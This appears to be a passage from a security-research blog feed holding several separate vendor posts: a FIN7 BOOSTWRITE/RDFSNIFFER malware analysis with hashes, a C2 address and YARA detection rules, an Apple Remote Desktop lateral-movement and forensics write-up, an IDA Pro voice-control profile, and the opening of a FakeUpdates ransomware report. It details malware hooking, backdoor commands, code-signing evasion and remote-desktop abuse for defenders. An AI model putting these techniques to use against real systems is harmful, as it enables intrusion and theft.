When the RDFSNIFFER module is loaded by BOOSTWRITE it hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface (Table 1). Furthermore, this enables the malware to alter the user’s last input time to ensure application sessions do not time out.

Win32 API Function

Hook Description

CertVerifyCertificateChainPolicy

Used to man-in-the-middle SSL sessions

CertGetCertificateChain

Used to man-in-the-middle SSL sessions

WSAConnect

Used to man-in-the-middle socket connections

connect

Used to man-in-the-middle socket connections

ConnectEx

Used to man-in-the-middle socket connections

DispatchMessageW

Used to hijack the utility's UI

DispatchMessageA

Used to hijack the utility's UI

DefWindowProcW

Used to hijack the utility's UI

DefWindowProcA

Used to hijack the utility's UI

GetLastInputInfo

Used to change the user's last input time (to avoid timed lock outs)

Table 1: RDFSNIFFER’s Hooked Win32 API Functions

This module also contains a backdoor component that enables it to inject commands into an active RDFClient session. This backdoor allows an attacker to upload, download, execute and/or delete arbitrary files (Table 2).

Command Name

Legit Function in RDFClient

RDFClient Command ID

Description

Upload

FileMgrSendFile

107

Uploads a file to the remote system

Download

FileMgrGetFile

108

Retrieves a file from the remote system

Execute

RunCommand

3001

Executes a command on the remote system

DeleteRemote

FileMgrDeleteFile

3019

Deletes file on remote system

DeleteLocal

-

-

Deletes a local file

Table 2: RDFSNIFFER’s Backdoor Functions

Signed: Yours Truly, FIN7

While the majority of BOOSTWRITE variants recovered from investigations have been unsigned, Mandiant identified a signed BOOSTWRITE sample used by FIN7 during a recent investigation. Following that discovery, a signed BOOSTWRITE sample was uploaded to VirusTotal on October 3. This executable uses a code signing certificate issued by MANGO ENTERPRISE LIMITED (Table 3).

MD5

Organization

Country

Serial

a67d6e87283c34459b4660f19747a306

mango ENTERPRISE LIMITED

GB

32 7F 8F 10 74 78 42 4A BE B8 2A 85 DC 36 57 03 CC 82 70 5B

Table 3: Code signing certificate used for BOOSTWRITE

This indicates the operators may be actively altering this malware to avoid traditional detection mechanisms. Notably, the signed BOOSTWRITE sample had a 0/68 detection ratio when it was uploaded to VirusTotal, demonstrating the effectiveness of this tactic (Figure 2).


Figure 2: Current VirusTotal detection ratio for signed BOOSTWRITE

Use of a code signing certificate for BOOSTWRITE is not a completely new technique for FIN7 as the group has used digital certificates in the past to sign their phishing documents, backdoors, and later stage tools. By exploiting the trust inherently provided by code certificates, FIN7 increases their chances of bypassing various security controls and successfully compromising victims. The full evasion achieved against the detection engines deployed to VirusTotal – as compared to an unsigned BOOSTWRITE sample with an invalid checksum– illustrates that FIN7’s methods were effective in subverting both traditional detection and ML binary classification engines. This is a known issue and has been deeply studied since at least 2016’s “Chains of Distrust” research and 2017’s “Certified Malware” paper. Since there are plenty of goodware samples with bad or no signatures – and a growing number of malware samples with good signatures – there is no easy solution here. The upside is that vendors selectively deploy engines to VirusTotal (including FireEye) and VT detection performance often isn’t a comprehensive representation of encountering full security technology stacks that implement detection-in-depth. Later in this blog we further explore BOOSTWRITE’s PE Authenticode signature, its anomalies, and how code signing can be turned from a detection challenge into detection opportunities.

Outlook and Implications

While these incidents have also included FIN7’s typical and long-used toolsets, such as CARBANAK and BABYMETAL, the introduction of new tools and techniques provides further evidence FIN7 is continuing to evolve in response to security enhancements. Further, the use of code signing in at least one case highlights the group's judicious use of resources, potentially limiting their use of these certificates to cases where they have been attempting to bypass particular security controls. Barring any further law enforcement actions, we expect at least a portion of the actors who comprise the FIN7 criminal organization to continue conducting campaigns. As a result, organizations need to remain vigilant and continue to monitor for changes in methods employed by the FIN7 actors.

Sigs Up Dudes! Indicators, Toolmarks, and Detection Opportunities

While FireEye does not release our production detection logic for the code families, this section does contain some identification and hunting concepts that we adopt in our layered detection strategy. Table 4 contains malware samples referenced in this blog that FireEye is able to share from the larger set recovered during active investigations.

Type

Indicator(s)

BOOSTWRITE (signed)

MD5: a67d6e87283c34459b4660f19747a306
SHA-1: a873f3417d54220e978d0ca9ceb63cf13ec71f84
SHA-256: 18cc54e2fbdad5a317b6aeb2e7db3973cc5ffb01bbf810869d79e9cb3bf02bd5

C2: 109.230.199[.]227

BOOSTWRITE (unsigned)

MD5: af2f4142463f42548b8650a3adf5ceb2
SHA1: 09f3c9ae382fbd29fb47ecdfeb3bb149d7e961a1
SHA256: 8773aeb53d9034dc8de339651e61d8d6ae0a895c4c89b670d501db8dc60cd2d0

C2: 109.230.199[.]227

Table 4: Publicly-shareable BOOSTWRITE samples

The signed BOOSTWRITE sample has a PE Authenticode anomaly that can be detected using yara’s PE signature module. Specifically, the PE linker timestamp is prior to the Authenticode validity period, as seen in Table 5.

Timestamp

Description

2019-05-20 09:50:55 UTC

Signed BOOSTWRITE’s PE compilation time

2019-05-22 00:00 UTC
through
2020-05-21 23:59 UTC

Signed BOOSTWRITE’s “mango ENTERPRISE LIMITED” certificate validity window

Table 5: Relevant executabe timestamps

A public example of a Yara rule covering this particular PE Authenticode timestamp anomaly is available in a blog post from David Cannings, with the key logic shown in Figure 3.

pe.number_of_signatures > 0 and not for all i in (0..pe.number_of_signatures - 1):
     pe.signatures[i].valid_on(pe.timestamp)

Figure 3: Excerpt of NCC Group’s research Yara rule

There are other PE Authenticode anomalies that can also be represented as Yara rules to surface similarly suspicious files. Of note, this signed BOOSTWRITE sample has no counter signature and, while the unauthenticated attributes timestamp structure is present, it is empty. In preparing this blog, FireEye’s Advanced Practices team identified a possible issue with VirusTotal’s parsing of signed executable timestamps as seen in Figure 4.



Figure 4: Inconsistency in VirusTotal file signature timestamps for the signed BOOSTWRITE sample

FireEye filed a bug report with Google to address the discrepancy in VirusTotal in order to remove confusion for other users.

To account for the detection weaknesses introduced by techniques like code signing, our Advanced Practices team combines the malicious confidence spectrum that comes from ML detection systems with file oddities and anomalies (weak signals) to surface highly interesting and evasive malware. This technique was recently described in our own Dr. Steven Miller’s Definitive Dossier of Devilish Debug Details. In fact, the exact same program database (PDB) path-based approach from his blog can be applied to the toolmarks seen in this sample for a quick hunting rule. Figure 5 provides the PDB path of the BOOSTWRITE samples from this blog.

F:\projects\DWriteImpl\Release\DWriteImpl.pdb

Figure 5: BOOSTWRITE PDB path

The Yara rule template can be applied to result in the quick rule in Figure 6.

rule ConventionEngine_BOOSTWRITE
{
 meta:
     author = "Nick Carr (@itsreallynick)"
     reference = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
strings:
     $weetPDB = /RSDS[\x00-\xFF]{20}[a-zA-Z]?:?\\[\\\s|*\s]?.{0,250}\\DWriteImpl[\\\s|*\s]?.{0,250}\.pdb\x00/ nocase
 condition:
     (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $weetPDB and filesize < 6MB
}

Figure 6: Applying BOOSTWRITE’s PDB path to a Yara rule

We can apply this same concept across other executable traits, such as BOOSTWRITE’s export DLL name (DWriteImpl.dll), to create quick and easy rules that can aid in quick discovery as seen in Figure 7.

rule Exports_BOOSTWRITE
{
meta:
     author = "Steve Miller (@stvemillertime) & Nick Carr (@itsreallynick)"
strings:
     $exyPants = "DWriteImpl.dll" nocase
condition:
     uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $exyPants at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12)) and filesize < 6MB
}

Figure 7: Applying BOOSTWRITE’s export DLL names to a Yara rule (Note: this rule was updated following publication. It previously read "module_ls.dll", which is for Turla and unrelated.)

Of course, resilient prevention capabilities are needed and to that end, FireEye detects this activity across our platforms. Table 6 contains several specific detection names from a larger list of detection capabilities that captured this activity natively.

Platform

Signature Name

Endpoint Security

MalwareGuard ML detection (unsigned variants)

Network Security and Email Security

Malware.binary.dll (dynamic detection)
MalwareGuard ML detection (unsigned variants)
APTFIN.Dropper.Win.BOOSTWRITE (network traffic)
APTFIN.Backdoor.Win.RDFSNIFFER (network traffic)
FE_APTFIN_Dropper_Win_BOOSTWRITE (static code family detection)
FE_APTFIN_Backdoor_Win_RDFSNIFFER (static code family detection)

Table 6: FireEye detection matrix

Don’t Sweat the Techniques – MITRE ATT&CK Mappings

BOOSTWRITE

ID

Tactic

BOOSTWRITE Context

T1022

Data Encrypted

BOOSTWRITE encodes its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit IV to evade detection

T1027

Obfuscated Files or Information

BOOSTWRITE encodes its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit IV to evade detection

T1038

DLL Search Order Hijacking

BOOSTWRITE exploits the applications’ loading of the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads the local ‘Dwrite’ dll

T1116

Code Signing

BOOSTWRITE variants were observed signed by a valid CA

T1129

Execution through Module Load

BOOSTWRITE exploits the applications’ loading of the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads the local ‘Dwrite’ dll

T1140

Deobfuscate/Decode Files or Information

BOOSTWRITE decodes its payloads at runtime using using a ChaCha stream cipher with a 256-bit key and 64-bit IV

RDFSNIFFER

ID

Tactic

RDFSNIFFER Context

T1106

Execution through API

RDFSNIFFER hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface

T1107

File Deletion

RDFSNIFFER has the capability of deleting local files

T1179

Hooking

RDFSNIFFER hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface

Acknowledgements

The authors want to thank Steve Elovitz, Jeremy Koppen, and the many Mandiant incident responders that go toe-to-toe with FIN7 regularly, quietly evicting them from victim environments. We appreciate the thorough detection engineering from Ayako Matsuda and the reverse engineering from FLARE’s Dimiter Andonov, Christopher Gardner and Tyler Dean. A special thanks to FLARE’s Troy Ross for the development of his PE Signature analysis service and for answering our follow-up questions. Shout out to Steve Miller for his hot fire research and Yara anomaly work. And lastly, the rest of the Advanced Practices team for both the unparalleled front-line FIN7 technical intelligence expertise and MITRE ATT&CK automated mapping project – with a particular thanks to Regina Elwell and Barry Vengerik.

Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil

Attackers often make their lives easier by relying on pre-existing operating system and third party applications in an enterprise environment. Leveraging these applications assists them with blending in with normal network activity and removes the need to develop or bring their own malware. This tactic is often referred to as Living Off The Land. But what about when that land is an Apple orchard?

In recent enterprise macOS investigations, FireEye Mandiant identified the Apple Remote Desktop application as a lateral movement vector and as a source for valuable forensic artifacts.

Apple Remote Desktop (ARD) was first released in 2002 and is Apple’s “desktop management system for software distribution, asset management, and remote assistance”. An ARD deployment consists of administrator and client machines. While the administrator app must be downloaded from the macOS App Store, the client application is included natively as part of macOS. Client systems must be added to the client list on an administrator system manually, or they can be discovered via Bonjour if they are in the same local subnet as the administrator system. In a typical enterprise environment deployment, managers would be the ARD administrators and have the ability to view, manage, and remotely control their managed personnel’s workstations via ARD.

Lateral Movement

Mandiant has observed attackers using the ARD screen sharing function to move laterally between systems. If remote desktop was not enabled on a target system, Mandiant observed attackers connecting to systems via SSH and executing a kickstart command to enable remote desktop management. This allowed remote desktop access to the target systems. The following is an example from the macOS Unified Log showing a kickstart command used by an attacker to enable remote desktop access for all users with all privileges:


Figure 1: Kickstart command example

During an investigation, you can use a few different artifacts to trace this activity. Execution of the kickstart command modifies the contents of the configuration file /Library/Application Support/Apple/Remote Desktop/RemoteManagement.launchd to contain the string “enabled”. SSH login activity can be found in the Apple System Logs or Audit Logs. Execution of the kickstart command can be found in the Unified Logs, as seen in Figure 1.

An ARD administrator has a substantial amount of power available to them, similar to compromising an administrator account in a Windows environment. By compromising an account that has access to ARD administrator system, an attacker can perform any of the following actions:

  • Remotely control VNC-enabled machines, including in “Curtain Mode” which hides the remote actions from the local workstation’s screen
  • Transfer files
  • Remotely shut down or restart multiple machines simultaneously
  • Schedule tasks
  • Execute AppleScript and UNIX shell scripts

Apple’s ARD web page and the ARD help page contain more details about ARD’s capabilities.

ARD Reporting as a Forensic Force Multiplier

Along with remote system control functionality, Apple Remote Desktop’s asset management capabilities include conducting remote Spotlight searches, file searching, generating software version information reports, and more importantly, generating application usage and user history reports. The reporting process generally follows these steps:

  1. Client systems compute reports and cache the data locally before transferring them to the administrator system (the default policy is to begin this at 12:00 AM local time, daily).
  2. Data received from clients is cached on the administrator system. Alternatively, a macOS system with the administrator version of ARD installed can be set up as a “Task Server” for a centralized collection option.
  3. Cached data is written to SQLite database on the administrator system

The cached data is stored in various subdirectories under the /private/var/db/RemoteManagement/ parent directory. The directory has the following structure:


Figure 2: /private/var/db/RemoteManagement/ directory structure

This directory structure is present on all systems, but which files exist in which directories depends on whether the system is an ARD client or administrator system.

Artifacts from ARD Client Systems

There is one directory that is the focus for investigations on client systems: /private/var/db/RemoteManagement/caches/. This directory contains the following files, which are the local client data cache that is periodically reported to the administrator system. Do note, however, that these files are routinely deleted by the system, so they may not be present. These files are typically deleted from the client system once they are transmitted to the administrator system. Once transmitted, the data is stored on the administrator system.

File

Description

AppUsage.plist

plist file containing application usage data

AppUsage.tmp

Binary plist file containing application usage data, often the same as or less thorough than AppUsage.plist

asp.cache

Binary plist of system information

filesystem.cache

Database containing an index of the entire file system, including users and groups

sysinfo.cache

Binary plist containing system information, some of which is also present in asp.cache

UserAcct.tmp

Binary plist containing user login activity

Table 1: ARD cache files

In our experience, the most useful information available from these files is application usage and user activity.

Application Usage

The RemoteManagement/caches/AppUsage.plist file contains one key per application, where each key is the full path of the application, such as file:///Applications/Calculator.app/.

Each application key contains a dictionary that includes a “runData” array and a “Name” string, which is the friendly name of the application, such as “Calculator”, as seen in Figure 3.


Figure 3: AppUsage.plist structure

Each “runData” array contains at least one dictionary consisting of the following keys and values:

Key

Value Format

Description

wasQuit

Boolean: true or false

Indicator of whether or not the application was quit prior to the last report time. This field may not exist if the value is not “true”.

Frontmost

Number of seconds

Total duration which the application was “frontmost” on the screen

Launched

macOS absolute timestamp

Time the application was launched

runLength

Number of seconds

Duration the application was run

username

String

User who launched the application

Table 2: AppUsage.plist runData keys and values

Of the two application usage cache artifacts, RemoteManagement/caches/AppUsage.plist usually contains the same or more content than RemoteManagement/caches/AppUsage.tmp.

User Activity

The RemoteManagement/caches/UserAcct.tmp file is a binary plist that contains user activity that can be correlated with other artifacts on a macOS systems, such as the Apple System Logs or Audit Logs. The file contains keys with the short name of each user logged on the system.

Each key contains a dictionary that includes a “uid” string with the user’s UID, and an array for each login type: console, tty, or SSH. Each login-type array contains at least one dictionary consisting of the following keys and values:

Key

Value Format

Description

inTime

macOS absolute timestamp

Time the user logged in

outTime

macOS absolute timestamp

Time the user logged out

host

String

Originating host for remote login. This field has been observed to not be consistently present.

Table 3: UserAcct.tmp keys and values

Artifacts From ARD Administrator Systems

The data outlined in Table 1 is reported to the administrator system daily. The files are then stored in the RemoteManagement/ClientCaches/ directory. Each file is renamed to the MAC address of the reporting system and placed into the appropriate subdirectory, as seen in Table 4. The subdirectories contain the following:

Subdirectory

Data Contained in Each File

ApplicationUsage/

AppUsage.plist files

SoftwareInfo/

Filesystem.cache files

SystemInfo/

Sysinfo.cache files

UserAccounting/

UserAcct.tmp files

Table 4: /private/var/db/RemoteManagement/ClientCaches/ subdirectories

Additionally, there is a plist file, RemoteManagement/ClientCaches/cacheAccess.plist that contains keys of MAC addresses with values of more MAC addresses. The purpose and context for this file has yet to be determined.

The Gold Mine

All the aforementioned data, with the exception of the filesystem.cache files, is added to the main SQLite database RemoteManagement/RMDB/rmdb.sqlite3 (“RMDB”). The RMDB exists on all ARD systems but is only populated on the administrator system. It houses a wealth of information about the systems in the ARD network over a significant timespan. Mandiant has observed data for application usage timestamps from over a year prior to when we acquired a database on a live system.

The RMDB file contains five tables: ApplicationName, ApplicationUsage, PropertyNameMap, SystemInformation, and UserUsage. The following sections detail each table within the database:

ApplicationName

This table is an index for the applications on each system, where each application is assigned an item sequence number (“ItemSeq”) per system. This data is used for correlation in the ApplicationUsage table.

Column

Value Format

Description

ComputerID

String

Client MAC address, no separators

AppName

String

Friendly application name

AppURL

String

Application URL path (i.e. file:///Applications/Calculator.app)

ItemSeq

Integer

ID number for each application, per ComputerID, used for the AppName table

LastUpdated

macOS absolute timestamp

Last report time of the client

Table 5: ApplicationName table columns

ApplicationUsage

The AppName table is unique in the fact the “Frontmost” and “LaunchTime” values in the table are swapped. The research at the time of this blog post was verified on MacOS 10.14 (Mojave).

Column

Value Format

Description

ComputerID

String

Client MAC address, no separators

FrontMost

macOS absolute timestamp

Application launch time

LaunchTime

Number of seconds to 6 decimal places

Total duration the application was “frontmost” on screen

RunLength

Number of seconds to 6 decimal places

Total duration the application was running

ItemSeq

Integer

ItemSeq number for the respective ComputerID, referenced in the ApplicationName table

LastUpdated

macOS absolute timestamp

Last report time of the client

UserName

String

User who launched the application

RunState

Integer

“1” for “running”, or “0” for “terminated” at the time of the last report

Table 6: ApplicationUsage table columns

PropertyNameMap

This table is used as a reference for the SystemInformation table.

Column

Value Format

Description

ObjectName

String

Various elements of a macOS system, such as Mac_HardDriveElement, Mac_USBDeviceElement, Mac_SystemInfoElement

PropertyName

String

Property names for each element, such as ProductName, ProductID, VendorID, VendorName for Mac_USBDeviceElement

PropertyMapID

Integer

ID number for each property, per element

Table 7: PropertyNameMap table columns

SystemInformation

There is a substantial amount of system information collected in this table. This table can be leveraged to extract USB device information, IP addresses, hostnames, and more, of all the reported client systems.

Column

Value Format

Description

ComputerID

String

Client MAC address, with colon separators

ObjectName

String

Elements of a macOS system outlined in the PropertyNameMap table

PropertyName

String

Properties per element outlined in the PropertyNameMap table

ItemSeq

Integer

ID number for each element, i.e. if there are 4 Mac_USBDeviceElement data sets, each one will have an ItemSeq number, 0-3, to group the properties together

Value

String

Data for the respective property

LastUpdated

yyyy-mm-ddThh:mm:ssZ

24 hour local time, last report time of the client. Example: 2019-08-07T02:11:34Z

Table 8: SystemInformation table columns

UserUsage

This table contains the user login activity for all the reported client systems.

Column

Description of Value

ComputerID

Client MAC address, no separators

LastUpdated

macOS absolute timestamp, last report time of the client

UserName

Short name of the user

LoginType

Console, tty, or ssh

inTime

macOS absolute timestamp, time the user logged in

outTime

macOS absolute timestamp, time the user logged out

Host

Originating host for remote login. This field has been observed to not be consistently present.

Table 9: UserUsage table columns

Filesystem Cache

The RemoteManagement/ClientCaches/filesystem.cache file is a database that indexes the files and directories found on a macOS computer’s file system. Rather than using SQLite like the RMDB, ARD uses a custom database implementation to track this information. Fortunately, the database file format is fairly simple, consisting of a file header, six tables, and entries that point to string values. By interpreting the information in the filesystem cache file, an investigator can recreate the directory structure of an ARD-enable system. Mandiant uses this technique to identify and demonstrate the existence of attacker-created files.

The database header, identified by the magic value “hdix”, contains metadata about the database, such as the total number of indexed folders, files, and symlinks. Pointers from this header lead to the six tables: “main”, “names” (file names), “kinds” (file extensions), “versions” (macOS app bundle version infos), “users”, and “groups”. Entries in the “main” table contain references to entries in the other tables; by walking these references, an investigator can recover full file system paths and metadata.

In practice, the filesystem.cache file may be tens of megabytes in size, tracking dozens or hundreds of thousands of file system entries. Figure 4 shows truncated content of a parsed file system cache file; these entries are for the artifacts discussed in this article!


Figure 4: Screenshot of filesystem.cache contents, listing ARD artifacts

On a macOS system, the program “build_hd_index” traverses the file system and indexes the files and directories into filesystem.cache. Figure 5 shows a portion of the documentation for this tool; as expected, the default output directory is [/private]/var/db/RemoteManagement/caches/.


Figure 5: documentation for build_hd_index

Ironically, internet message board posts going back to at least 2007 complain of the performance impact of this tool. A post by “Anonymous” indicates that “build_hd_index” was designed to support file indexing on OS X Panther (2003), which didn’t have Spotlight. Now, 16 years later, we can exploit these artifacts during an incident response.

Introducing: ARDvark

It was evident that if this artifact exists in a future investigation, leveraging its wealth of data will be critical to identifying attacker activities. In some scenarios, investigators may be able to generate reports directly from an ARD administrator system, but this may not always be the case. If not, then investigators would have to rely on manually acquiring and extracting information from the RMDB file on the ARD administrator system. ARDvark is a tool that extracts all user activity and application usage recorded in the RMDB and outputs the data in an analyst-friendly format.

ARDvark will also process the AppUsage.plist and UserAcct.tmp files found on ARD client systems under /private/var/db/RemoteManagement/caches/. Additionally, ARDvark has the capability to parse the filesystem.cache files to produce a file system listing, as well as all users and groups present on the respective system. Please see the FireEye Github for more information.

Detecting and Preventing ARD Abuse

To detect suspicious ARD usage, organizations can monitor for anomalous modification of the /Library/Application Support/Apple/Remote Desktop/RemoteManagement.launchd file to identify remote desktop access enablement where ARD is not used. Analyzing the Unified Logs for evidence of unexpected kickstart commands during threat hunting missions can uncover suspicious ARD usage as well.

Mitigating ARD abuse is reliant upon the principle of least privilege. Mandiant recommends allowing as few remote control privileges as possible, and only allowing administrator privileges to necessary accounts. Apple provides guidance on setting privileges, and authenticating without using local accounts with ARD in the help page and in the ARD user guide. ARD administrators can then routinely generate reports in the ARD application to ensure no changes are made to administration privilege settings.

A Bushel of Evidence

Application usage artifacts for macOS are few and far between. To date, some of the best artifacts for application usage include CoreAnalytics files and the Spotlight database, but none of these artifacts provide the exact time of execution of all applications. While ARD artifacts are not present across every macOS system, if ARD is deployed in an enterprise environment it may provide some of the most valuable data for investigators which you would not uncover otherwise.

User login activity typically exists in the Apple System Logs and Audit Logs, but short log retention is frequently an issue when the average attacker dwell time in 2018 was 78 days. The RMDB provides a potential source of application usage and user login information that is over a year old, long outliving typical log retention times.

The system information available in the RMDB includes IP addresses, USB device information, and more which may be useful to investigators. Also, the file system cache files that are collected contain an extensive file listing of multiple macOS systems, which allows investigators to identify files or users of interest on other systems without having to collect data from the suspect system directly.

ARD is an excellent example of how remote administration tools provide an attack surface for abuse while simultaneously providing a vast amount of data to help piece together malicious activity, all from a single system. If your organization utilizes ARD, consider reviewing the information available through the reporting functionality during threat hunting and future investigative purposes, as the artifact doesn’t fall far from the tree.

Threat Roundup for September 27 to October 4

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Sep. 27 to Oct 4. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU10042019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

IDA, I Think It’s Time You And I Had a Talk: Controlling IDA Pro With Voice Control Software

Introduction

This blog post is the next episode in the FireEye Labs Advanced Reverse Engineering (FLARE) team Script Series. Today, we are sharing something quite unusual. It is not a tool or a virtual machine distribution, nor is it a plugin or script for a popular reverse engineering tool or framework. Rather, it is a profile created for a consumer software application completely unrelated to reverse engineering or malware analysis… until now. The software is named VoiceAttack, and its purpose is to make it easy for users to control other software on their computer using voice commands. With FLARE’s new profile for VoiceAttack, users can completely control IDA Pro with their voice! Have you ever dreamed of telling IDA Pro to decompile a function or show you the strings of a binary? Well dream no more! Not only does our profile give you total control of the software, it also provides shortcuts and other cool features not previously available. It’s our hope that providing voice control for the world’s most popular disassembler will further empower users with repetitive stress injuries or disabilities to more effectively put their reverse engineering skills to use with this new accessibility option as well as helping the community at large work more efficiently.

Check out our video demonstration of some of the features of the profile to see it in action.

How Does It Work?

Voice attack is an inexpensive software application that utilizes the Windows Speech Recognition (WSR) feature to enable the creation of user-defined, voice-activated macros. The user specifies a key word or phrase, then defines one or more actions to be taken when that word or phrase is recognized. The most common types of actions to be taken include key presses, mouse movement and clicks, and clipboard manipulation. However, there are many other more advanced features available that provide a lot of flexibility to users including variables, loops, and conditionals. You can even have the computer speak to you in response to your commands! VoiceAttack requires an internet connection, but only during the registration process, after which the network adapter can be disabled or configured to a network that cannot reach the internet without issue.

To use VoiceAttack, you must first train Windows Speech Recognition to recognize your voice. Instructions on how to do so can be found here. This process only takes a few minutes at minimum, but the more time you spend training, the better the experience you will have with it.

What Does the IDA Pro Profile Provide?

FLARE’s IDA Pro profile for VoiceAttack maps every advertised keyboard shortcut in IDA Pro to a voice command. Although this is only one part of what the profile provides, many users will find this in itself very useful. When developing this profile, I was shocked to discover just how many keyboard shortcuts there really are for IDA Pro and what can be accomplished with them. Some of my favorite shortcuts are found under the View->Open Subviews and Windows menus. With this profile, I can simply say “show strings” or “show structures” or “show window x” to change the tab I am currently viewing or open a new view in a tab without having to move my mouse cursor anywhere. The next few paragraphs describe some other useful commands to make any reverse engineer’s job easier. For a more detailed description of the profile and commands available, see the Github page.

Macros

A series of voice commands can perform multi-step actions not otherwise reachable by individual keyboard shortcuts. For example, wouldn’t it be nice to have commands to toggle the visibility of opcode bytes (see Figure 1)? Currently, you have to open the Options menu, select the General menu item, input a value in the Number of opcode bytes text field, and click the OK button. Well, now you can simply say “show opcodes” or “hide opcodes” and it will be so!


Figure 1: Configuring the number of opcode bytes to show in IDA Pro's disassembly view

Defining a Unicode string in IDA Pro is a multi-step exercise, whether you navigate to the Edit->Strings menu or use the “string literals” keyboard shortcut Alt+A followed by pressing the U key as shown in Figure 2. Now you can simply say “make Unicode string” and the work is done for you.


Figure 2: String literals dialog in IDA Pro

Reversing a C++ application? The Create struct from selection action is a very helpful feature in this case, but it requires you to navigate to the Edit->Structs menu in order to use it. The voice command “create struct from selection” does this for you automatically. The “look it up” command will copy the currently highlighted token in the disassembly and search Google for it using your default browser. There are several other macros in the profile that are like this and save you a lot of time navigating menus and dialogs to perform simple actions.

Cursor Movement, Dialogs, and Navigation

The cursor movement commands allow the user to move the cursor up, down, left, or right, one or more times, in specified increments. These commands also allow for scrolling with a voice command that commences scrolling in a chosen direction, and another voice command for stopping scrolling. There are even voice commands to set the speed of the scroll to slow, medium, or fast. In the disassembly view, the cursor can also be moved per “word” on the current line of the disassembly or decompilation, or even per basic block or function.

Like many other applications, dialogs are a part of IDA Pro’s user interface. The ability to easily navigate and interact with items in a dialog with your voice is essential to a smooth user experience. Voice commands in the profile enable the user to easily click the OK or Cancel buttons, toggle checkboxes, and tab through controls in the dialog in both directions and in specified increments.

With the aid of a companion IDAPython plugin, additional navigation commands are supported. Commands that allow the user to move the cursor to the beginning or end of the current function, to the next or previous “call” instruction, to the previous or next instruction containing the highlighted token, or to a specified number of bytes forward or backwards from the current cursor position help to make voice-controlled navigation easier.

These cursor movement and navigation commands enable users to have full control of IDA Pro without the use of their hands. While this is true and an important goal for the profile, it is not practical for people who have full use of their hands to go completely hands-free. The commands that navigate the cursor in IDA Pro will never be as fast or easy as simply using the mouse to point and click somewhere on the screen. In any case, users will find themselves building up a collection of voice commands they prefer to use that will depend on personal tastes. However, enabling full voice control allows reverse engineers who do not have full use of their hands to still effectively operate IDA Pro, which we hope will be of great use to the community. Having such a capability is also useful for those who suffer from repetitive strain injury.

Input Recognition

The commands described so far give you control over IDA Pro with your voice, but there is still the matter of providing textual input for items such as function and variable names, comments, and other text input fields. VoiceAttack does provide the ability in macros to enable and disable what is called “Dictation Mode”. When in Dictation Mode, any recognized words are added to a buffer of text until Dictation Mode is disabled. Then this text can be used elsewhere in the macro. Unfortunately, this feature is not designed to recognize the kinds of technical terms one would be using in the context of reverse engineering programs. Even if it were, there is still the issue of having to format the text to be a valid function or variable name. Instead of wrestling with this feature to try to make it work for this purpose, a very large and growing collection of “input recognition” commands was created. These commands are designed to recognize common words used in the names of functions and variables, as well as full function names as found in the C runtime libraries and the Windows APIs. Once recognized, the word or function name is copied to the user’s clipboard and pasted into the text field. To avoid the inadvertent triggering of such commands during the regular operation of IDA Pro, these commands are only active when the “input mode” is enabled. This mode is enabled automatically when certain commands are activated such as “rename” or “find”, and automatically disabled when dialog commands such as “OK” or “cancel” are activated. The input mode can also be manually manipulated with the “input mode on” and “input mode off” commands.

Conclusion

Today, the FLARE team is releasing a profile for VoiceAttack and a companion IDAPython plugin that enables full voice control of IDA Pro along with many added convenience features. The profile contains over 1000 defined commands and growing. It is easy to view, edit, and add commands to this profile to customize it to suit your needs or to improve it for the community at large. The VoiceAttack software is highly affordable and enables you to create profiles for any applications or games that you use. For installation instructions and usage information, see the project’s Github page. Give it a try today!

Head Fake: Tackling Disruptive Ransomware Attacks

Within the past several months, FireEye has observed financially-motivated threat actors employ tactics that focus on disrupting business processes by deploying ransomware in mass throughout a victim’s environment. Understanding that normal business processes are critical to organizational success, these ransomware campaigns have been accompanied with multi-million dollar ransom amounts. In this post, we’ll provide a technical examination of one recent campaign that stems back to a technique that we initially reported on in April 2018.

Between May and September 2019, FireEye responded to multiple incidents involving a financially-motivated threat actor who leveraged compromised web infrastructure to establish an initial foothold in victim environments. This activity bared consistencies with a fake browser update campaign first identified in April 2018 – now tracked by FireEye as FakeUpdates. In this newer campaign, the threat actors leveraged victim systems to deploy malware such as Dridex or NetSupport, and multiple post-exploitation frameworks. The threat actors’ ultimate goal in some cases was to ransom systems in mass with BitPaymer or DoppelPaymer ransomware (see Figure 1).


Figure 1: Recent FakeUpdates infection chain

Due to campaign proliferation, we have responded to this activity at both Managed Defense customers and incident response investigations performed by Mandiant. Through Managed Defense network and host monitoring as well as Mandiant’s incident response findings, we observed the routes the threat actor took, the extent of the breaches, and exposure of their various toolkits.

Knock, Knock: FakeUpdates are Back!

In April 2018, FireEye identified a campaign that used compromised websites to deliver heavily obfuscated Trojan droppers masquerading as Chrome, Internet Explorer, Opera, and/or Firefox browser updates. The compromised sites contained code injected directly into the HTML or in JavaScript components rendered by the pages which had been injected. These sites were accessed by victim users either via HTTP redirects or watering-hole techniques utilized by the attackers.

